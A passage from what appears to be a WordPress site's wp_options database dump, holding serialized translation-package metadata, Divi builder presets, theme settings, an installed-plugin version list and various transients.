10:03:08\";s:12:\"english_name\";s:7:\"Occitan\";s:11:\"native_name\";s:7:\"Occitan\";s:7:\"package\";s:63:\"https://downloads.wordpress.org/translation/core/4.8.29/oci.zip\";s:3:\"iso\";a:2:{i:1;s:2:\"oc\";i:2;s:3:\"oci\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:9:\"Contunhar\";}}s:5:\"pa_IN\";a:8:{s:8:\"language\";s:5:\"pa_IN\";s:7:\"version\";s:5:\"4.7.2\";s:7:\"updated\";s:19:\"2017-01-16 05:19:43\";s:12:\"english_name\";s:15:\"Panjabi (India)\";s:11:\"native_name\";s:18:\"ਪੰਜਾਬੀ\";s:7:\"package\";s:64:\"https://downloads.wordpress.org/translation/core/4.7.2/pa_IN.zip\";s:3:\"iso\";a:2:{i:1;s:2:\"pa\";i:2;s:3:\"pan\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:25:\"ਜਾਰੀ ਰੱਖੋ\";}}s:5:\"pl_PL\";a:8:{s:8:\"language\";s:5:\"pl_PL\";s:7:\"version\";s:3:\"7.1\";s:7:\"updated\";s:19:\"2026-08-20 04:43:31\";s:12:\"english_name\";s:6:\"Polish\";s:11:\"native_name\";s:6:\"Polski\";s:7:\"package\";s:62:\"https://downloads.wordpress.org/translation/core/7.1/pl_PL.zip\";s:3:\"iso\";a:2:{i:1;s:2:\"pl\";i:2;s:3:\"pol\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:9:\"Kontynuuj\";}}s:2:\"ps\";a:8:{s:8:\"language\";s:2:\"ps\";s:7:\"version\";s:6:\"4.3.35\";s:7:\"updated\";s:19:\"2015-12-02 21:41:29\";s:12:\"english_name\";s:6:\"Pashto\";s:11:\"native_name\";s:8:\"پښتو\";s:7:\"package\";s:62:\"https://downloads.wordpress.org/translation/core/4.3.35/ps.zip\";s:3:\"iso\";a:2:{i:1;s:2:\"ps\";i:2;s:3:\"pus\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:19:\"دوام ورکړه\";}}s:5:\"pt_BR\";a:8:{s:8:\"language\";s:5:\"pt_BR\";s:7:\"version\";s:3:\"7.1\";s:7:\"updated\";s:19:\"2026-07-27 14:30:54\";s:12:\"english_name\";s:19:\"Portuguese (Brazil)\";s:11:\"native_name\";s:20:\"Português do Brasil\";s:7:\"package\";s:62:\"https://downloads.wordpress.org/translation/core/7.1/pt_BR.zip\";s:3:\"iso\";a:2:{i:1;s:2:\"pt\";i:2;s:3:\"por\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:9:\"Continuar\";}}s:5:\"pt_AO\";a:8:{s:8:\"language\";s:5:\"pt_AO\";s:7:\"version\";s:6:\"6.4.10\";s:7:\"updated\";s:19:\"2023-08-21 12:15:00\";s:12:\"english_name\";s:19:\"Portuguese (Angola)\";s:11:\"native_name\";s:20:\"Português de Angola\";s:7:\"package\";s:65:\"https://downloads.wordpress.org/translation/core/6.4.10/pt_AO.zip\";s:3:\"iso\";a:1:{i:1;s:2:\"pt\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:9:\"Continuar\";}}s:5:\"pt_PT\";a:8:{s:8:\"language\";s:5:\"pt_PT\";s:7:\"version\";s:3:\"7.1\";s:7:\"updated\";s:19:\"2026-08-19 12:42:57\";s:12:\"english_name\";s:21:\"Portuguese (Portugal)\";s:11:\"native_name\";s:10:\"Português\";s:7:\"package\";s:62:\"https://downloads.wordpress.org/translation/core/7.1/pt_PT.zip\";s:3:\"iso\";a:1:{i:1;s:2:\"pt\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:9:\"Continuar\";}}s:10:\"pt_PT_ao90\";a:8:{s:8:\"language\";s:10:\"pt_PT_ao90\";s:7:\"version\";s:3:\"7.1\";s:7:\"updated\";s:19:\"2026-08-19 12:58:29\";s:12:\"english_name\";s:27:\"Portuguese (Portugal, AO90)\";s:11:\"native_name\";s:17:\"Português (AO90)\";s:7:\"package\";s:67:\"https://downloads.wordpress.org/translation/core/7.1/pt_PT_ao90.zip\";s:3:\"iso\";a:1:{i:1;s:2:\"pt\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:9:\"Continuar\";}}s:3:\"rhg\";a:8:{s:8:\"language\";s:3:\"rhg\";s:7:\"version\";s:5:\"4.7.2\";s:7:\"updated\";s:19:\"2016-03-16 13:03:18\";s:12:\"english_name\";s:8:\"Rohingya\";s:11:\"native_name\";s:8:\"Ruáinga\";s:7:\"package\";s:62:\"https://downloads.wordpress.org/translation/core/4.7.2/rhg.zip\";s:3:\"iso\";a:1:{i:3;s:3:\"rhg\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:8:\"Continue\";}}s:5:\"ro_RO\";a:8:{s:8:\"language\";s:5:\"ro_RO\";s:7:\"version\";s:3:\"7.1\";s:7:\"updated\";s:19:\"2026-08-14 07:49:31\";s:12:\"english_name\";s:8:\"Romanian\";s:11:\"native_name\";s:8:\"Română\";s:7:\"package\";s:62:\"https://downloads.wordpress.org/translation/core/7.1/ro_RO.zip\";s:3:\"iso\";a:2:{i:1;s:2:\"ro\";i:2;s:3:\"ron\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:9:\"Continuă\";}}s:5:\"ru_RU\";a:8:{s:8:\"language\";s:5:\"ru_RU\";s:7:\"version\";s:3:\"7.1\";s:7:\"updated\";s:19:\"2026-08-20 06:28:04\";s:12:\"english_name\";s:7:\"Russian\";s:11:\"native_name\";s:14:\"Русский\";s:7:\"package\";s:62:\"https://downloads.wordpress.org/translation/core/7.1/ru_RU.zip\";s:3:\"iso\";a:2:{i:1;s:2:\"ru\";i:2;s:3:\"rus\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:20:\"Продолжить\";}}s:3:\"sah\";a:8:{s:8:\"language\";s:3:\"sah\";s:7:\"version\";s:5:\"4.7.2\";s:7:\"updated\";s:19:\"2017-01-21 02:06:41\";s:12:\"english_name\";s:5:\"Sakha\";s:11:\"native_name\";s:14:\"Сахалыы\";s:7:\"package\";s:62:\"https://downloads.wordpress.org/translation/core/4.7.2/sah.zip\";s:3:\"iso\";a:2:{i:2;s:3:\"sah\";i:3;s:3:\"sah\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:12:\"Салҕаа\";}}s:3:\"snd\";a:8:{s:8:\"language\";s:3:\"snd\";s:7:\"version\";s:6:\"5.4.21\";s:7:\"updated\";s:19:\"2020-07-07 01:53:37\";s:12:\"english_name\";s:6:\"Sindhi\";s:11:\"native_name\";s:8:\"سنڌي\";s:7:\"package\";s:63:\"https://downloads.wordpress.org/translation/core/5.4.21/snd.zip\";s:3:\"iso\";a:3:{i:1;s:2:\"sd\";i:2;s:3:\"snd\";i:3;s:3:\"snd\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:15:\"اڳتي هلو\";}}s:5:\"si_LK\";a:8:{s:8:\"language\";s:5:\"si_LK\";s:7:\"version\";s:5:\"4.7.2\";s:7:\"updated\";s:19:\"2016-11-12 06:00:52\";s:12:\"english_name\";s:7:\"Sinhala\";s:11:\"native_name\";s:15:\"සිංහල\";s:7:\"package\";s:64:\"https://downloads.wordpress.org/translation/core/4.7.2/si_LK.zip\";s:3:\"iso\";a:2:{i:1;s:2:\"si\";i:2;s:3:\"sin\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:44:\"දිගටම කරගෙන යන්න\";}}s:5:\"sk_SK\";a:8:{s:8:\"language\";s:5:\"sk_SK\";s:7:\"version\";s:3:\"7.1\";s:7:\"updated\";s:19:\"2026-07-02 03:54:13\";s:12:\"english_name\";s:6:\"Slovak\";s:11:\"native_name\";s:11:\"Slovenčina\";s:7:\"package\";s:62:\"https://downloads.wordpress.org/translation/core/7.1/sk_SK.zip\";s:3:\"iso\";a:2:{i:1;s:2:\"sk\";i:2;s:3:\"slk\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:12:\"Pokračovať\";}}s:3:\"skr\";a:8:{s:8:\"language\";s:3:\"skr\";s:7:\"version\";s:6:\"6.9-RC\";s:7:\"updated\";s:19:\"2025-04-24 16:58:02\";s:12:\"english_name\";s:7:\"Saraiki\";s:11:\"native_name\";s:14:\"سرائیکی\";s:7:\"package\";s:63:\"https://downloads.wordpress.org/translation/core/6.9-RC/skr.zip\";s:3:\"iso\";a:1:{i:3;s:3:\"skr\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:17:\"جاری رکھو\";}}s:5:\"sl_SI\";a:8:{s:8:\"language\";s:5:\"sl_SI\";s:7:\"version\";s:3:\"7.1\";s:7:\"updated\";s:19:\"2026-07-16 12:28:04\";s:12:\"english_name\";s:9:\"Slovenian\";s:11:\"native_name\";s:13:\"Slovenščina\";s:7:\"package\";s:62:\"https://downloads.wordpress.org/translation/core/7.1/sl_SI.zip\";s:3:\"iso\";a:2:{i:1;s:2:\"sl\";i:2;s:3:\"slv\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:8:\"Nadaljuj\";}}s:2:\"sq\";a:8:{s:8:\"language\";s:2:\"sq\";s:7:\"version\";s:3:\"7.1\";s:7:\"updated\";s:19:\"2026-05-28 08:38:28\";s:12:\"english_name\";s:8:\"Albanian\";s:11:\"native_name\";s:5:\"Shqip\";s:7:\"package\";s:59:\"https://downloads.wordpress.org/translation/core/7.1/sq.zip\";s:3:\"iso\";a:2:{i:1;s:2:\"sq\";i:2;s:3:\"sqi\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:6:\"Vazhdo\";}}s:5:\"sr_RS\";a:8:{s:8:\"language\";s:5:\"sr_RS\";s:7:\"version\";s:5:\"6.9.7\";s:7:\"updated\";s:19:\"2025-12-03 15:37:44\";s:12:\"english_name\";s:7:\"Serbian\";s:11:\"native_name\";s:23:\"Српски језик\";s:7:\"package\";s:64:\"https://downloads.wordpress.org/translation/core/6.9.7/sr_RS.zip\";s:3:\"iso\";a:2:{i:1;s:2:\"sr\";i:2;s:3:\"srp\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:14:\"Настави\";}}s:5:\"sv_SE\";a:8:{s:8:\"language\";s:5:\"sv_SE\";s:7:\"version\";s:3:\"7.1\";s:7:\"updated\";s:19:\"2026-08-21 10:39:10\";s:12:\"english_name\";s:7:\"Swedish\";s:11:\"native_name\";s:7:\"Svenska\";s:7:\"package\";s:62:\"https://downloads.wordpress.org/translation/core/7.1/sv_SE.zip\";s:3:\"iso\";a:2:{i:1;s:2:\"sv\";i:2;s:3:\"swe\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:9:\"Fortsätt\";}}s:2:\"sw\";a:8:{s:8:\"language\";s:2:\"sw\";s:7:\"version\";s:5:\"6.9.7\";s:7:\"updated\";s:19:\"2026-02-21 11:17:30\";s:12:\"english_name\";s:7:\"Swahili\";s:11:\"native_name\";s:9:\"Kiswahili\";s:7:\"package\";s:61:\"https://downloads.wordpress.org/translation/core/6.9.7/sw.zip\";s:3:\"iso\";a:2:{i:1;s:2:\"sw\";i:2;s:3:\"swa\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:7:\"Endelea\";}}s:3:\"szl\";a:8:{s:8:\"language\";s:3:\"szl\";s:7:\"version\";s:5:\"4.7.2\";s:7:\"updated\";s:19:\"2016-09-24 19:58:14\";s:12:\"english_name\";s:8:\"Silesian\";s:11:\"native_name\";s:17:\"Ślōnskŏ gŏdka\";s:7:\"package\";s:62:\"https://downloads.wordpress.org/translation/core/4.7.2/szl.zip\";s:3:\"iso\";a:1:{i:3;s:3:\"szl\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:13:\"Kōntynuować\";}}s:5:\"ta_IN\";a:8:{s:8:\"language\";s:5:\"ta_IN\";s:7:\"version\";s:5:\"4.7.2\";s:7:\"updated\";s:19:\"2017-01-27 03:22:47\";s:12:\"english_name\";s:5:\"Tamil\";s:11:\"native_name\";s:15:\"தமிழ்\";s:7:\"package\";s:64:\"https://downloads.wordpress.org/translation/core/4.7.2/ta_IN.zip\";s:3:\"iso\";a:2:{i:1;s:2:\"ta\";i:2;s:3:\"tam\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:24:\"தொடரவும்\";}}s:5:\"ta_LK\";a:8:{s:8:\"language\";s:5:\"ta_LK\";s:7:\"version\";s:6:\"4.2.39\";s:7:\"updated\";s:19:\"2015-12-03 01:07:44\";s:12:\"english_name\";s:17:\"Tamil (Sri Lanka)\";s:11:\"native_name\";s:15:\"தமிழ்\";s:7:\"package\";s:65:\"https://downloads.wordpress.org/translation/core/4.2.39/ta_LK.zip\";s:3:\"iso\";a:2:{i:1;s:2:\"ta\";i:2;s:3:\"tam\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:18:\"தொடர்க\";}}s:2:\"te\";a:8:{s:8:\"language\";s:2:\"te\";s:7:\"version\";s:5:\"4.7.2\";s:7:\"updated\";s:19:\"2017-01-26 15:47:39\";s:12:\"english_name\";s:6:\"Telugu\";s:11:\"native_name\";s:18:\"తెలుగు\";s:7:\"package\";s:61:\"https://downloads.wordpress.org/translation/core/4.7.2/te.zip\";s:3:\"iso\";a:2:{i:1;s:2:\"te\";i:2;s:3:\"tel\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:30:\"కొనసాగించు\";}}s:2:\"th\";a:8:{s:8:\"language\";s:2:\"th\";s:7:\"version\";s:6:\"5.8.15\";s:7:\"updated\";s:19:\"2022-06-08 04:30:30\";s:12:\"english_name\";s:4:\"Thai\";s:11:\"native_name\";s:9:\"ไทย\";s:7:\"package\";s:62:\"https://downloads.wordpress.org/translation/core/5.8.15/th.zip\";s:3:\"iso\";a:2:{i:1;s:2:\"th\";i:2;s:3:\"tha\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:15:\"ต่อไป\";}}s:2:\"tl\";a:8:{s:8:\"language\";s:2:\"tl\";s:7:\"version\";s:3:\"7.1\";s:7:\"updated\";s:19:\"2026-07-02 08:27:46\";s:12:\"english_name\";s:7:\"Tagalog\";s:11:\"native_name\";s:7:\"Tagalog\";s:7:\"package\";s:59:\"https://downloads.wordpress.org/translation/core/7.1/tl.zip\";s:3:\"iso\";a:2:{i:1;s:2:\"tl\";i:2;s:3:\"tgl\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:10:\"Magpatuloy\";}}s:5:\"tr_TR\";a:8:{s:8:\"language\";s:5:\"tr_TR\";s:7:\"version\";s:3:\"7.1\";s:7:\"updated\";s:19:\"2026-08-19 19:54:51\";s:12:\"english_name\";s:7:\"Turkish\";s:11:\"native_name\";s:8:\"Türkçe\";s:7:\"package\";s:62:\"https://downloads.wordpress.org/translation/core/7.1/tr_TR.zip\";s:3:\"iso\";a:2:{i:1;s:2:\"tr\";i:2;s:3:\"tur\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:5:\"Devam\";}}s:5:\"tt_RU\";a:8:{s:8:\"language\";s:5:\"tt_RU\";s:7:\"version\";s:5:\"4.7.2\";s:7:\"updated\";s:19:\"2016-11-20 20:20:50\";s:12:\"english_name\";s:5:\"Tatar\";s:11:\"native_name\";s:19:\"Татар теле\";s:7:\"package\";s:64:\"https://downloads.wordpress.org/translation/core/4.7.2/tt_RU.zip\";s:3:\"iso\";a:2:{i:1;s:2:\"tt\";i:2;s:3:\"tat\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:17:\"дәвам итү\";}}s:3:\"tah\";a:8:{s:8:\"language\";s:3:\"tah\";s:7:\"version\";s:5:\"4.7.2\";s:7:\"updated\";s:19:\"2016-03-06 18:39:39\";s:12:\"english_name\";s:8:\"Tahitian\";s:11:\"native_name\";s:10:\"Reo Tahiti\";s:7:\"package\";s:62:\"https://downloads.wordpress.org/translation/core/4.7.2/tah.zip\";s:3:\"iso\";a:3:{i:1;s:2:\"ty\";i:2;s:3:\"tah\";i:3;s:3:\"tah\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:8:\"Continue\";}}s:5:\"ug_CN\";a:8:{s:8:\"language\";s:5:\"ug_CN\";s:7:\"version\";s:3:\"7.1\";s:7:\"updated\";s:19:\"2026-06-17 14:09:03\";s:12:\"english_name\";s:6:\"Uighur\";s:11:\"native_name\";s:16:\"ئۇيغۇرچە\";s:7:\"package\";s:62:\"https://downloads.wordpress.org/translation/core/7.1/ug_CN.zip\";s:3:\"iso\";a:2:{i:1;s:2:\"ug\";i:2;s:3:\"uig\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:26:\"داۋاملاشتۇرۇش\";}}s:2:\"uk\";a:8:{s:8:\"language\";s:2:\"uk\";s:7:\"version\";s:5:\"7.0.4\";s:7:\"updated\";s:19:\"2026-07-15 10:36:30\";s:12:\"english_name\";s:9:\"Ukrainian\";s:11:\"native_name\";s:20:\"Українська\";s:7:\"package\";s:61:\"https://downloads.wordpress.org/translation/core/7.0.4/uk.zip\";s:3:\"iso\";a:2:{i:1;s:2:\"uk\";i:2;s:3:\"ukr\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:20:\"Продовжити\";}}s:2:\"ur\";a:8:{s:8:\"language\";s:2:\"ur\";s:7:\"version\";s:6:\"5.4.21\";s:7:\"updated\";s:19:\"2020-04-09 11:17:33\";s:12:\"english_name\";s:4:\"Urdu\";s:11:\"native_name\";s:8:\"اردو\";s:7:\"package\";s:62:\"https://downloads.wordpress.org/translation/core/5.4.21/ur.zip\";s:3:\"iso\";a:2:{i:1;s:2:\"ur\";i:2;s:3:\"urd\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:19:\"جاری رکھیں\";}}s:5:\"uz_UZ\";a:8:{s:8:\"language\";s:5:\"uz_UZ\";s:7:\"version\";s:8:\"5.8-beta\";s:7:\"updated\";s:19:\"2021-02-28 12:02:22\";s:12:\"english_name\";s:5:\"Uzbek\";s:11:\"native_name\";s:11:\"O‘zbekcha\";s:7:\"package\";s:67:\"https://downloads.wordpress.org/translation/core/5.8-beta/uz_UZ.zip\";s:3:\"iso\";a:2:{i:1;s:2:\"uz\";i:2;s:3:\"uzb\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:11:\"Davom etish\";}}s:2:\"vi\";a:8:{s:8:\"language\";s:2:\"vi\";s:7:\"version\";s:3:\"7.1\";s:7:\"updated\";s:19:\"2026-08-19 22:52:04\";s:12:\"english_name\";s:10:\"Vietnamese\";s:11:\"native_name\";s:14:\"Tiếng Việt\";s:7:\"package\";s:59:\"https://downloads.wordpress.org/translation/core/7.1/vi.zip\";s:3:\"iso\";a:2:{i:1;s:2:\"vi\";i:2;s:3:\"vie\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:12:\"Tiếp tục\";}}s:3:\"yor\";a:8:{s:8:\"language\";s:3:\"yor\";s:7:\"version\";s:5:\"7.0.4\";s:7:\"updated\";s:19:\"2026-04-18 05:57:08\";s:12:\"english_name\";s:6:\"Yoruba\";s:11:\"native_name\";s:8:\"Yorùbá\";s:7:\"package\";s:62:\"https://downloads.wordpress.org/translation/core/7.0.4/yor.zip\";s:3:\"iso\";a:3:{i:1;s:2:\"yo\";i:2;s:3:\"yor\";i:3;s:3:\"yor\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:18:\"Tẹ̀síwájú si\";}}s:5:\"zh_CN\";a:8:{s:8:\"language\";s:5:\"zh_CN\";s:7:\"version\";s:3:\"7.1\";s:7:\"updated\";s:19:\"2026-08-19 14:27:41\";s:12:\"english_name\";s:15:\"Chinese (China)\";s:11:\"native_name\";s:12:\"简体中文\";s:7:\"package\";s:62:\"https://downloads.wordpress.org/translation/core/7.1/zh_CN.zip\";s:3:\"iso\";a:2:{i:1;s:2:\"zh\";i:2;s:3:\"zho\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:6:\"继续\";}}s:5:\"zh_TW\";a:8:{s:8:\"language\";s:5:\"zh_TW\";s:7:\"version\";s:5:\"7.0.4\";s:7:\"updated\";s:19:\"2026-04-27 20:54:39\";s:12:\"english_name\";s:16:\"Chinese (Taiwan)\";s:11:\"native_name\";s:12:\"繁體中文\";s:7:\"package\";s:64:\"https://downloads.wordpress.org/translation/core/7.0.4/zh_TW.zip\";s:3:\"iso\";a:2:{i:1;s:2:\"zh\";i:2;s:3:\"zho\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:6:\"繼續\";}}s:5:\"zh_HK\";a:8:{s:8:\"language\";s:5:\"zh_HK\";s:7:\"version\";s:6:\"6.2.10\";s:7:\"updated\";s:19:\"2022-07-15 15:25:03\";s:12:\"english_name\";s:19:\"Chinese (Hong Kong)\";s:11:\"native_name\";s:12:\"香港中文\";s:7:\"package\";s:65:\"https://downloads.wordpress.org/translation/core/6.2.10/zh_HK.zip\";s:3:\"iso\";a:2:{i:1;s:2:\"zh\";i:2;s:3:\"zho\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:6:\"繼續\";}}}','off'),(199259,'et_divi_builder_global_presets_d5','a:1:{s:6:\"module\";a:1:{s:12:\"divi/section\";a:2:{s:5:\"items\";a:1:{s:13:\"6a13ba7409375\";a:10:{s:2:\"id\";s:13:\"6a13ba7409375\";s:10:\"moduleName\";s:12:\"divi/section\";s:4:\"name\";s:16:\"Section Preset 1\";s:5:\"attrs\";a:1:{s:6:\"module\";a:1:{s:10:\"decoration\";a:1:{s:10:\"background\";a:1:{s:7:\"desktop\";a:1:{s:5:\"value\";a:3:{s:5:\"color\";s:7:\"#ffffff\";s:8:\"gradient\";a:1:{s:7:\"enabled\";s:3:\"off\";}s:5:\"image\";a:4:{s:7:\"enabled\";s:3:\"off\";s:4:\"size\";s:7:\"initial\";s:8:\"position\";s:8:\"left top\";s:6:\"repeat\";s:6:\"repeat\";}}}}}}}s:10:\"styleAttrs\";a:1:{s:6:\"module\";a:1:{s:10:\"decoration\";a:1:{s:10:\"background\";a:1:{s:7:\"desktop\";a:1:{s:5:\"value\";a:3:{s:5:\"color\";s:7:\"#ffffff\";s:8:\"gradient\";a:1:{s:7:\"enabled\";s:3:\"off\";}s:5:\"image\";a:3:{s:4:\"size\";s:7:\"initial\";s:8:\"position\";s:8:\"left top\";s:6:\"repeat\";s:6:\"repeat\";}}}}}}}s:11:\"renderAttrs\";a:1:{s:6:\"module\";a:1:{s:10:\"decoration\";a:1:{s:10:\"background\";a:1:{s:7:\"desktop\";a:1:{s:5:\"value\";a:1:{s:8:\"gradient\";a:1:{s:7:\"enabled\";s:3:\"off\";}}}}}}}s:7:\"version\";s:19:\"5.0.0-public-beta.1\";s:4:\"type\";s:6:\"module\";s:7:\"created\";i:1779677812;s:7:\"updated\";i:1779677812;}}s:7:\"default\";s:13:\"6a13ba7409375\";}}}','off'),(199260,'et_divi_builder_is_legacy_presets_imported_to_d5','yes','off'),(214842,'_transient_timeout_et_check_mod_pagespeed','1787485804','off'),(214843,'_transient_et_check_mod_pagespeed','','off'),(161459,'theme_mods_blossom-coach','a:3:{s:18:\"custom_css_post_id\";i:-1;s:18:\"nav_menu_locations\";a:1:{s:7:\"primary\";i:2;}s:16:\"sidebars_widgets\";a:2:{s:4:\"time\";i:1779676298;s:4:\"data\";a:13:{s:19:\"wp_inactive_widgets\";a:3:{i:0;s:6:\"meta-2\";i:1;s:8:\"search-2\";i:2;s:17:\"recent-comments-2\";}s:7:\"sidebar\";a:3:{i:0;s:14:\"recent-posts-2\";i:1;s:10:\"archives-2\";i:2;s:12:\"categories-2\";}s:6:\"client\";a:0:{}s:5:\"about\";a:0:{}s:3:\"cta\";a:0:{}s:11:\"testimonial\";a:0:{}s:7:\"service\";a:0:{}s:10:\"simple-cta\";a:0:{}s:7:\"contact\";a:0:{}s:10:\"footer-one\";a:0:{}s:10:\"footer-two\";a:0:{}s:12:\"footer-three\";a:0:{}s:11:\"footer-four\";a:0:{}}}}','off'),(181156,'monsterinsights_sitenotes_installed','1770808041','auto'),(198522,'fm_key','tofsDxzRKYXZFmuTep6jI3wHb','auto'),(198521,'_site_transient_et_update_all_plugins','O:8:\"stdClass\":3:{s:7:\"checked\";a:15:{s:19:\"akismet/akismet.php\";s:5:\"4.1.9\";s:43:\"all-in-one-seo-pack/all_in_one_seo_pack.php\";s:5:\"4.2.0\";s:33:\"alx-extensions/alx-extensions.php\";s:5:\"1.1.2\";s:25:\"duplicator/duplicator.php\";s:6:\"1.5.14\";s:50:\"google-analytics-for-wordpress/googleanalytics.php\";s:6:\"10.0.1\";s:9:\"hello.php\";s:5:\"1.7.2\";s:21:\"meta-box/meta-box.php\";s:6:\"5.3.10\";s:23:\"pagelayer/pagelayer.php\";s:5:\"1.4.8\";s:43:\"popularfx-templates/popularfx-templates.php\";s:5:\"1.1.7\";s:31:\"popup-builder/popup-builder.php\";s:5:\"4.0.4\";s:47:\"really-simple-ssl/rlrsssl-really-simple-ssl.php\";s:6:\"4.0.15\";s:47:\"regenerate-thumbnails/regenerate-thumbnails.php\";s:5:\"3.1.5\";s:45:\"tinymce-visualblocks/tinymce-visualblocks.php\";s:5:\"1.0.5\";s:27:\"wp-pagenavi/wp-pagenavi.php\";s:6:\"2.93.4\";s:39:\"wp-file-manager/file_folder_manager.php\";s:5:\"8.0.4\";}s:8:\"response\";a:0:{}s:12:\"last_checked\";i:1779254138;}','off'),(199220,'theme_mods_twentytwentyfive','a:5:{i:0;b:0;s:19:\"wp_classic_sidebars\";a:0:{}s:18:\"nav_menu_locations\";a:0:{}s:18:\"custom_css_post_id\";i:-1;s:16:\"sidebars_widgets\";a:2:{s:4:\"time\";i:1779677799;s:4:\"data\";a:1:{s:19:\"wp_inactive_widgets\";a:6:{i:0;s:6:\"meta-2\";i:1;s:8:\"search-2\";i:2;s:17:\"recent-comments-2\";i:3;s:14:\"recent-posts-2\";i:4;s:10:\"archives-2\";i:5;s:12:\"categories-2\";}}}}','off'),(199241,'et_divi_builder_global_presets_ng','O:8:\"stdClass\":1:{s:13:\"et_pb_section\";O:8:\"stdClass\":2:{s:7:\"presets\";O:8:\"stdClass\":1:{s:8:\"_initial\";O:8:\"stdClass\":5:{s:4:\"name\";s:16:\"Section Preset 1\";s:7:\"created\";i:0;s:7:\"updated\";i:0;s:7:\"version\";s:5:\"4.9.4\";s:8:\"settings\";O:8:\"stdClass\":6:{s:16:\"background_color\";s:7:\"#ffffff\";s:29:\"use_background_color_gradient\";s:3:\"off\";s:23:\"background_enable_image\";s:3:\"off\";s:15:\"background_size\";s:7:\"initial\";s:19:\"background_position\";s:8:\"top_left\";s:17:\"background_repeat\";s:6:\"repeat\";}}}s:7:\"default\";s:8:\"_initial\";}}','off'),(199242,'et_divi_builder_global_presets_history_ng','O:8:\"stdClass\":2:{s:7:\"history\";a:1:{i:0;O:8:\"stdClass\":3:{s:8:\"settings\";O:8:\"stdClass\":1:{s:13:\"et_pb_section\";O:8:\"stdClass\":2:{s:7:\"presets\";O:8:\"stdClass\":1:{s:8:\"_initial\";O:8:\"stdClass\":5:{s:4:\"name\";s:16:\"Section Preset 1\";s:7:\"created\";i:0;s:7:\"updated\";i:0;s:7:\"version\";s:5:\"4.9.4\";s:8:\"settings\";O:8:\"stdClass\":6:{s:16:\"background_color\";s:7:\"#ffffff\";s:29:\"use_background_color_gradient\";s:3:\"off\";s:23:\"background_enable_image\";s:3:\"off\";s:15:\"background_size\";s:7:\"initial\";s:19:\"background_position\";s:8:\"top_left\";s:17:\"background_repeat\";s:6:\"repeat\";}}}s:7:\"default\";s:8:\"_initial\";}}s:4:\"time\";i:1744203358554;s:5:\"label\";s:14:\"Edited Section\";}}s:5:\"index\";s:1:\"0\";}','off'),(199243,'et_divi_builder_presets_history_meta','a:2:{s:5:\"index\";i:0;s:4:\"size\";i:1;}','off'),(199244,'et_divi_builder_presets_history_item_0','O:8:\"stdClass\":3:{s:8:\"settings\";O:8:\"stdClass\":1:{s:13:\"et_pb_section\";O:8:\"stdClass\":2:{s:7:\"presets\";O:8:\"stdClass\":1:{s:8:\"_initial\";O:8:\"stdClass\":5:{s:4:\"name\";s:16:\"Section Preset 1\";s:7:\"created\";i:0;s:7:\"updated\";i:0;s:7:\"version\";s:5:\"4.9.4\";s:8:\"settings\";O:8:\"stdClass\":6:{s:16:\"background_color\";s:7:\"#ffffff\";s:29:\"use_background_color_gradient\";s:3:\"off\";s:23:\"background_enable_image\";s:3:\"off\";s:15:\"background_size\";s:7:\"initial\";s:19:\"background_position\";s:8:\"top_left\";s:17:\"background_repeat\";s:6:\"repeat\";}}}s:7:\"default\";s:8:\"_initial\";}}s:4:\"time\";i:1744203358554;s:5:\"label\";s:14:\"Edited Section\";}','off'),(214849,'_site_transient_timeout_theme_roots','1787402123','off'),(214850,'_site_transient_theme_roots','a:12:{s:4:\"Divi\";s:7:\"/themes\";s:8:\"Divi_old\";s:7:\"/themes\";s:13:\"blossom-coach\";s:7:\"/themes\";s:20:\"blossom-health-coach\";s:7:\"/themes\";s:9:\"clearwork\";s:7:\"/themes\";s:11:\"polite-blog\";s:7:\"/themes\";s:6:\"polite\";s:7:\"/themes\";s:8:\"spa-lite\";s:7:\"/themes\";s:16:\"twentytwentyfive\";s:7:\"/themes\";s:16:\"twentytwentyfour\";s:7:\"/themes\";s:17:\"twentytwentythree\";s:7:\"/themes\";s:15:\"twentytwentytwo\";s:7:\"/themes\";}','off'),(213739,'_site_transient_timeout_php_check_990bfacb848fa087bcfc06850f5e4447','1787401010','off'),(213740,'_site_transient_php_check_990bfacb848fa087bcfc06850f5e4447','a:5:{s:19:\"recommended_version\";s:3:\"8.3\";s:15:\"minimum_version\";s:3:\"7.4\";s:12:\"is_supported\";b:0;s:9:\"is_secure\";b:0;s:13:\"is_acceptable\";b:0;}','off'),(198529,'filemanager_email_verified_1','yes','auto'),(180187,'monsterinsights_version_upgraded_from','8.5.0','auto'),(180189,'monsterinsights_migration_log','a:1:{i:0;a:4:{s:9:\"migration\";s:17:\"1.0.0-cache-table\";s:5:\"level\";s:4:\"info\";s:7:\"message\";s:20:\"Creating cache 